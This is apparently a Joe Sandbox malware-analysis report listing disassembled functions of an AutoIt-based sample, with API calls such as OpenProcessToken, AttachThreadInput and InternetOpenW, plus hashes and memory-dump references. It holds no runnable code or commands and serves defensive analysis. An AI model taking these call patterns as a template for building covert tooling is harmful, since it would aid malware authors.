Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: a5974a9b5bb7933f934a46c050c02745b34ca408d4cc059a1d5fbac922938df7
Instruction ID: cd05e449bdf85b20fdf0f54ecf6f96327a6be816ef75920d4417e87bb14fe377
Opcode Fuzzy Hash: a5974a9b5bb7933f934a46c050c02745b34ca408d4cc059a1d5fbac922938df7
Instruction Fuzzy Hash: 64F0E23100125AFBDB122F94AD0AFDE3F98AF06320F144052FA11A20E2CB750660DFE5

Function 00B6A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B6A399
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B6A3AC
GetCurrentThreadId.KERNEL32 ref: 00B6A3B3
AttachThreadInput.USER32(00000000), ref: 00B6A3BA

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 87c3e79673c152dfb54f9e29116b5eb3ddd11f668a2f9f3da985313d59ebd298
Instruction ID: 80db914649e99cc8198f5b0df22d328727503d9af7740b340bbaad72c9de467c
Opcode Fuzzy Hash: 87c3e79673c152dfb54f9e29116b5eb3ddd11f668a2f9f3da985313d59ebd298
Instruction Fuzzy Hash: 0FE03932141328BADF201BA2DD0CEEB3F5CEF167B1F008026F609E6060CA758540CBA0

Function 00B12218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00B12231
SetTextColor.GDI32(?,000000FF), ref: 00B1223B
SetBkMode.GDI32(?,00000001), ref: 00B12250
GetStockObject.GDI32(00000005), ref: 00B12258
GetWindowDC.USER32(?,00000000), ref: 00B4C0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 00B4C0E0
GetPixel.GDI32(00000000,?,00000000), ref: 00B4C0F9
GetPixel.GDI32(00000000,00000000,?), ref: 00B4C112
GetPixel.GDI32(00000000,?,?), ref: 00B4C132
ReleaseDC.USER32(?,00000000), ref: 00B4C13D

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 34b9d770e753e2bc4f89e4f2ad553fa364e9aa5586eb77e22a77b16b8ac6c196
Instruction ID: 7f954824499557371ee115ec6a39c0cbb78b35a20683163ef0c939567e09cfe1
Opcode Fuzzy Hash: 34b9d770e753e2bc4f89e4f2ad553fa364e9aa5586eb77e22a77b16b8ac6c196
Instruction Fuzzy Hash: E6E06D32200245EBDB215F64FD0D7E83F60EB15732F1083A7FA69A80E18B718A90DB51

Function 00B68C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00B68C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,00B6882E), ref: 00B68C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B6882E), ref: 00B68C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,00B6882E), ref: 00B68C7E

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 17ecb380d9449644087e22c7e8f0835d22fcad846e8aaca40661598179264da4
Instruction ID: 5a6bdf54382d86b70166435f8f9808d5ecedab49f1979e10fb22e649e6cb5946
Opcode Fuzzy Hash: 17ecb380d9449644087e22c7e8f0835d22fcad846e8aaca40661598179264da4
Instruction Fuzzy Hash: F6E08676642212EBD7205FB06E0DB663BACEF507A2F144969B245DB080DE788441CB61

Function 00B52187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00B52187
GetDC.USER32(00000000), ref: 00B52191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B521B1
ReleaseDC.USER32(?), ref: 00B521D2

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: d49120001efda35e7c8caf09f4a77bd0438ef0037da6b7d9770e8b3687c765dc
Instruction ID: 1f66ae5746c7364e6126ec49cc77e97e5f0d4977e962bcb97e93919d072b6c13
Opcode Fuzzy Hash: d49120001efda35e7c8caf09f4a77bd0438ef0037da6b7d9770e8b3687c765dc
Instruction Fuzzy Hash: FCE0E575840705EFDB019F60C948AAD7BF5EF4C361F208466F95AE7260CB788581DF40

Function 00B5219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00B5219B
GetDC.USER32(00000000), ref: 00B521A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B521B1
ReleaseDC.USER32(?), ref: 00B521D2

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c0de5b5bd40fdc9661cebf5dd86a69fec02b3325c124482d677e5bb057e24877
Instruction ID: a8433f5ced1f0509359540ea29190e7db25002d5e109b3ed4625dbab627aec77
Opcode Fuzzy Hash: c0de5b5bd40fdc9661cebf5dd86a69fec02b3325c124482d677e5bb057e24877
Instruction Fuzzy Hash: 03E0E575800305AFCB019F60C9086AD7BE5AB4C320F208426F95AD7260CB789541DF40

Function 00B6B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00B6B981

Strings

AutoIt3GUI, xrefs: 00B6B8F9
Container, xrefs: 00B6B8FE

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 630b424cc5a718a100984de19c6519e99ca59de459588830dbbc593e89bb5215
Instruction ID: 83db340e7077d3d0282d08df2ed822888ac1c32a95e7df97b7ced88be8fcd470
Opcode Fuzzy Hash: 630b424cc5a718a100984de19c6519e99ca59de459588830dbbc593e89bb5215
Instruction Fuzzy Hash: 67913A706106019FDB24DF68C884E6AB7F9FF48710F2485AEE949CB691DB74E881CB50

Function 00B7B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2FEC6: _wcscpy.LIBCMT ref: 00B2FEE9

Part of subcall function 00B19997: __itow.LIBCMT ref: 00B199C2
Part of subcall function 00B19997: __swprintf.LIBCMT ref: 00B19A0C

__wcsnicmp.LIBCMT ref: 00B7B298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00B7B361

Strings

LPT, xrefs: 00B7B292

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 9a47503085fa6f9afaf42ef42233a47b2f60885c7f298ba8e4df610ca0078020
Instruction ID: 15068b58b93664fbdf8695dfe1dfaaf0c0aa36148479f07c989a15cd0d7d4d7a
Opcode Fuzzy Hash: 9a47503085fa6f9afaf42ef42233a47b2f60885c7f298ba8e4df610ca0078020
Instruction Fuzzy Hash: 08615075A00215AFCB14DF94C895FAEB7F4EF08310F1181AAF55AAB291DB70AE80CF54

Function 00B22AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00B22AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00B22AE1

Strings

@, xrefs: 00B22AD5

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: c481162976d170d317ccc62d2e5cc4235eae3067546d93c87f3036d1388e3e94
Instruction ID: 0f8ae7455794aa3afdf531ec5ea514e550d4308317b749f29d6cff9c0fd0b7fd
Opcode Fuzzy Hash: c481162976d170d317ccc62d2e5cc4235eae3067546d93c87f3036d1388e3e94
Instruction Fuzzy Hash: 735148714187849BD320AF10D896BAFBBE8FF84310F82889DF2D9521A1DF708569CB56

Function 00B799BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00B1506B: __fread_nolock.LIBCMT ref: 00B15089

_wcscmp.LIBCMT ref: 00B79AAE
_wcscmp.LIBCMT ref: 00B79AC1

Strings

FILE, xrefs: 00B799FA

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 30e96115e22bccf32439a563c4a6f4b1c5ddce6102c2daf583fec777455574ac
Instruction ID: 7ba360feefc2509e6b06f43e634bf1a5749c3b151236769618a5a6ba963e2669
Opcode Fuzzy Hash: 30e96115e22bccf32439a563c4a6f4b1c5ddce6102c2daf583fec777455574ac
Instruction Fuzzy Hash: 1341E771A00609BADF209AE4DC86FEFB7FDDF49714F0040A9F914B7181DA75AA4487A1

Function 00B82882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B82892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B828C8

Strings

|, xrefs: 00B82899

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 11e1599fdae5884c9e05dc2ca00df53e0c27a3bd670daceff2bdf52e61575058
Instruction ID: 78cb3354a9f6cb6786a210cdfc8dae223d282aceaf47b49f78851e8654f1121a
Opcode Fuzzy Hash: 11e1599fdae5884c9e05dc2ca00df53e0c27a3bd670daceff2bdf52e61575058
Instruction Fuzzy Hash: D6310871800119AFCF11EFA1CC85EEEBFB9FF08310F1041A9F815A6166DB315A96DBA0

Function 00B96CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00B96D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B96DC2

Strings

static, xrefs: 00B96D22

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 323a42a1fe901ea91e7a2c6027ff497dd9a83485be673c61a72ec429b509b9b2
Instruction ID: 214fd41e347df34350837c91fb4d9902d678d85042ddc89c0ee7b7233d48227b
Opcode Fuzzy Hash: 323a42a1fe901ea91e7a2c6027ff497dd9a83485be673c61a72ec429b509b9b2
Instruction Fuzzy Hash: B5317A71210604AAEF109F68DC80AFB77F9FF49720F508669F9A9D7190DA31AC91CB60

Function 00B72D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B72E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B72E3B

Strings

0, xrefs: 00B72DF9

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 85200e8b5157ba11187769bad8fc0e050d8c22b8aa41d4320f930465b968b478
Instruction ID: b44dd47370e80a0aeca6da7ddf959e084dafd2764eda3d5c75185f8aeb92d7de
Opcode Fuzzy Hash: 85200e8b5157ba11187769bad8fc0e050d8c22b8aa41d4320f930465b968b478
Instruction Fuzzy Hash: E531E931A00305ABEB248F58C9857AEBBF9FF05350F1484AEEDE9E71A0E7709940DB51

Function 00B96943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B969D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B969DB

Strings

Combobox, xrefs: 00B9699D

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: a355736c5eedc125d6aa3be364a359f0a7d564a2f948458b2ac121e67b1a0b6b
Instruction ID: 6b09bcad70607c072ee3760cf1a3125d7f82ab84ebe6a81546cecf46d0c7d354
Opcode Fuzzy Hash: a355736c5eedc125d6aa3be364a359f0a7d564a2f948458b2ac121e67b1a0b6b
Instruction Fuzzy Hash: A011B2717002096FEF159F64CC90EFB37AAEB893A4F110175F958972A0D6719C5187A0

Function 00B96E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00B11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B11D73
Part of subcall function 00B11D35: GetStockObject.GDI32(00000011), ref: 00B11D87
Part of subcall function 00B11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B11D91

GetWindowRect.USER32(00000000,?), ref: 00B96EE0
GetSysColor.USER32(00000012), ref: 00B96EFA

Strings

static, xrefs: 00B96EBD

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: d06f90d702089ed22a6c28f6efe95d4d84e888574f8aa2ec726ce6593467d48d
Instruction ID: df933da03c20597fa4fb00363b6d5069e2d6d4745f9a1793ae01ee9a7f1524c1
Opcode Fuzzy Hash: d06f90d702089ed22a6c28f6efe95d4d84e888574f8aa2ec726ce6593467d48d
Instruction Fuzzy Hash: 6021447261020AAFDF04DFA8DE45AFA7BE8EB08314F014669F955D3250EA34E8619B60

Function 00B96B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00B96C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B96C20

Strings

edit, xrefs: 00B96BF5

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 86a2f187b551af43174664c18ceeb8ae4c98e53bcb16d4e87edc79e42383a9d1
Instruction ID: 29aecb9860d33397703766731e53c1a703eeaae3828be035e1631a906bbe937c
Opcode Fuzzy Hash: 86a2f187b551af43174664c18ceeb8ae4c98e53bcb16d4e87edc79e42383a9d1
Instruction Fuzzy Hash: 24119A71100208ABEF108F649D82EFA3BAAEB04378F604774F960D31E0DA35DC909B60

Function 00B72E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B72F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B72F30

Strings

0, xrefs: 00B72F07

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 3607bc661ee1ba5bb23b2540e574049219d8dd439727dcebb64ceca76ae1eab8
Instruction ID: dec8917f103ff57089fdbd8dad786e5cb50034b28e261c7aec0b34a7d486ae2c
Opcode Fuzzy Hash: 3607bc661ee1ba5bb23b2540e574049219d8dd439727dcebb64ceca76ae1eab8
Instruction Fuzzy Hash: 8E118231901115ABDF25DB58DC84BA9B7F9EB15310F1580E6E868AB2A0EBB0AD04C791

Function 00B824CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B82520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B82549

Strings

<local>, xrefs: 00B82511

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 7e2b512277f9760140a323075a4a8d99fd67d6f60c29e9fb93a1df4767d1f211
Instruction ID: 7475215f19d1374d47c39c6a03495ea054fa36c1d201a4af99e5154c13d47638
Opcode Fuzzy Hash: 7e2b512277f9760140a323075a4a8d99fd67d6f60c29e9fb93a1df4767d1f211
Instruction Fuzzy Hash: 8311E3B0140225BADB24AF518CE9EFBFFE8FB16361F10816AF90542150D2705940D7F0

Function 00B880A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B8830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00B880C8,?,00000000,?,?), ref: 00B88322

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B880CB
htons.WSOCK32(00000000,?,00000000), ref: 00B88108

Strings

255.255.255.255, xrefs: 00B880E3

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
